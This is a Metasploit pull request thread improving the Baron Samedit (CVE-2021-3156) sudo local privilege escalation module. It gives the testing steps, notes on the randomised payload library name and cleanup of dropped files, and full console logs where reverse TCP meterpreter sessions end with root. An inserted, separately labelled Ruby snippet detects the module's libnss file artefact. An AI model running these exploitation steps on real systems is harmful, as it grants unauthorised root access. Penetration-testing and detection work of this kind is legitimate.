
CVE-2021-3156 Sudo LPE (AKA: Baron Samedit) Improvements #14740

Merged (9 commits), Feb 22, 2021

Conversation

zeroSteiner (Contributor)

This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints. Unfortunately, I don't have any new targets to add yet. I made a couple of changes to the Linux mixins as well to facilitate what I was doing.

  • Update the mkdir mixin command to handle existing directories in the same way for meterpreter sessions as shell sessions (don't raise an exception).
  • Randomize the payload library that's loaded on disk.
  • Added a new "Automatic" target (and set it as the default) that selects a target via a regex fingerprint and get_sysinfo.
    • Updated get_sysinfo to remove leading and trailing whitespace around the version key
  • Fixed handling spaces in the WriteableDir datastore option. This involved updating the compiler mixin as well to escape spaces with backslashes.
  • Registered files for cleanup so everything that's written to disk as part of the exploitation process is now removed.

Testing

  • Get a non-root meterpreter session on an affected system (Ubuntu 20.04 works well)
  • Run: use exploit/linux/local/sudo_baron_samedit
  • Set the payload, RHOST and LHOST options as desired
  • Set the target to Automatic if necessary (it should be the default)
  • Set the WriteableDir to /tmp/Hello World or something else with a space in it. Make sure the directory already exists on the target system, the module will not create it automatically.
  • Run the exploit
    • See in the output that the correct exploit target was automatically selected
    • See that the payload that is written to disk has been randomized (it's not libnss_X/P0P_SH3LLZ_ .so.2 anymore)
    • See the exploit complete successfully and that the payload executed
    • See that all of the written files on the disk were removed automatically (this happens even if the exploit fails which you can test by setting the target to a different value)

Example Output

msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.34:22 - Sending stager...
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Sending stage (980808 bytes) to 192.168.159.34
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.34:47868) at 2021-02-11 11:55:21 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > getuid
Server username: smcintyre @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET Automatic
TARGET => Automatic
msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. sudo 1.8.31 maybe a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/libnss_9S9MeS/tB8M .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.34
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.34:47870) at 2021-02-11 11:55:56 -0500
[+] Deleted /tmp/p60htQTDNO
[+] Deleted /tmp/libnss_9S9MeS/tB8M .so.2
[+] Deleted /tmp/libnss_9S9MeS

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Library Name

The library name is randomized now, however since it's part of the memory corruption chain there are some constraints on it. From my testing, I noticed that the randomized component:

  • Must be exactly 13 characters long
  • Must contain exactly one / which may be placed anywhere in the string

The original C exploit was updated to take the library name as an optional parameter at the end. If it's omitted the original X/P0P_SH3LLZ_ value is used, allowing the exploit to still be compiled and run as a standalone unit.
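The exploit output above shows the one artefact this module leaves on disk before the overflow is triggered: a shared object under a directory named `libnss_<random>` whose file name is `<random> .so.2`, with a literal space before `.so.2`. A legitimate NSS module never has that shape, which makes it a cheap file-creation indicator. The following is an added example for defenders, not code from this PR or from the Metasploit module; the auditd-style log lines are constructed for the example (the paths in them are the ones quoted in the PR output), and the `exactly one /` check follows the constraint the PR author reports for the randomised component.

```ruby
# Added example (not part of the PR or the Metasploit module): flag log lines
# that reference the on-disk artefact written by the CVE-2021-3156 module,
# a path of the form "<dir>/libnss_<random>/<random> .so.2". The embedded
# space before ".so.2" and the "/" inside the library name are the telltales.
LIBNSS_ARTEFACT = %r{
  (?<path>
    (?<dir>/[^\s'"]*libnss_[^/\s'"]+)   # directory component ending in libnss_<random>
    /(?<file>[^/\s'"]+\ \.so\.2)        # file component "<random> .so.2" (note the space)
  )
}x

# Constructed sample input: two auditd-style PATH records and one msfconsole
# line, plus two benign entries that must not match.
SAMPLE_LINES = [
  'type=PATH msg=audit(1613063756.123:4): name="/tmp/libnss_9S9MeS/tB8M .so.2" nametype=CREATE',
  "[*] Writing '/tmp/libnss_wBjg/QaNxg1 .so.2' (564 bytes) ...",
  # benign: the distribution's real NSS module
  'type=PATH msg=audit(1613063756.124:5): name="/usr/lib/x86_64-linux-gnu/libnss_files.so.2" nametype=NORMAL',
  # benign: a libnss_ file without the separator/space pattern
  'type=PATH msg=audit(1613063756.125:6): name="/tmp/build/libnss_test.so.2" nametype=CREATE',
]

# Returns one hash per matching line with the full path, its directory and
# file components and the original line, so a triage script can act on them.
def find_libnss_artefacts(lines)
  lines.each_with_object([]) do |line, hits|
    m = LIBNSS_ARTEFACT.match(line)
    next unless m
    hits << { path: m[:path], dir: m[:dir], file: m[:file], line: line }
  end
end

# True when the text between "libnss_" and " .so.2" contains exactly one "/",
# the shape the PR author describes for the randomised library name.
def artefact_shape?(path)
  inner = path[%r{libnss_(.*) \.so\.2\z}, 1]
  return false if inner.nil?
  inner.count('/') == 1
end

if __FILE__ == $PROGRAM_NAME
  find_libnss_artefacts(SAMPLE_LINES).each do |hit|
    label = artefact_shape?(hit[:path]) ? 'HIT ' : 'WEAK'
    puts "#{label} #{hit[:path]}"
  end
end
```

Because the module registers the files for cleanup, the artefact may only exist for a few seconds; a file-creation audit rule on world-writable directories (or an EDR file event feed) is the practical source for these lines rather than a periodic filesystem scan.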


bcoles commented Feb 12, 2021

Here's another recent writeup about the libnss technique which may be useful as a reference URL. Targets Fedora 33, sudo 1.9.4p2 and 1.9.5p1 using GLibc 2.32.

@je5442804

Is it possible to add a CentOS target?


bcoles commented Feb 15, 2021

Is it possible to add a CentOS target?

No one has developed offsets for CentOS yet. Check out this writeup for information on the exploitation technique and adding targets.


@timwr timwr left a comment


Code looks good, however for some reason I can't reproduce this (and the original PoC) on an Ubuntu 20.04.1 VM.

@timwr timwr self-assigned this Feb 22, 2021
@timwr timwr merged commit edea755 into rapid7:master Feb 22, 2021

timwr commented Feb 22, 2021

Works well on Ubuntu 18.04:

msf6 exploit(multi/handler) > [*] Sending stage (3008420 bytes) to 192.168.13.114
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.114:60584) at 2021-02-22 17:58:41 +0000

msf6 exploit(multi/handler) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(linux/local/sudo_baron_samedit) > set LPORT 4427
LPORT => 4427
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 192.168.13.37:4427
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. sudo 1.8.21.2 is a vulnerable build.
[*] Using automatically selected target: Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)
[*] Writing '/tmp/libnss_wBjg/QaNxg1 .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.13.114
[*] Meterpreter session 2 opened (192.168.13.37:4427 -> 192.168.13.114:43306) at 2021-02-22 17:59:06 +0000
[+] Deleted /tmp/M4v8MGU98
[+] Deleted /tmp/libnss_wBjg/QaNxg1 .so.2
[+] Deleted /tmp/libnss_wBjg


meterpreter >
meterpreter > getuid
Server username: root @ user-vm (uid=0, gid=0, euid=0, egid=0)


timwr commented Feb 22, 2021

Release Notes

Improved the CVE-2021-3156 (a.k.a. Baron Samedit) module with a couple of features that were left out of the first submission due to time constraints (e.g. cleanup and randomisation of the payload library). Also added a target for Ubuntu 19.04.


bcoles commented Feb 22, 2021

This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints (e.g. cleanup and randomisation of the payload library).

Also adds a target for Ubuntu 19.04.

@zeroSteiner zeroSteiner deleted the feat/cve-2021-3156 branch February 23, 2021 17:02
@jmartin-tech jmartin-tech added the rn-enhancement release notes enhancement label Feb 25, 2021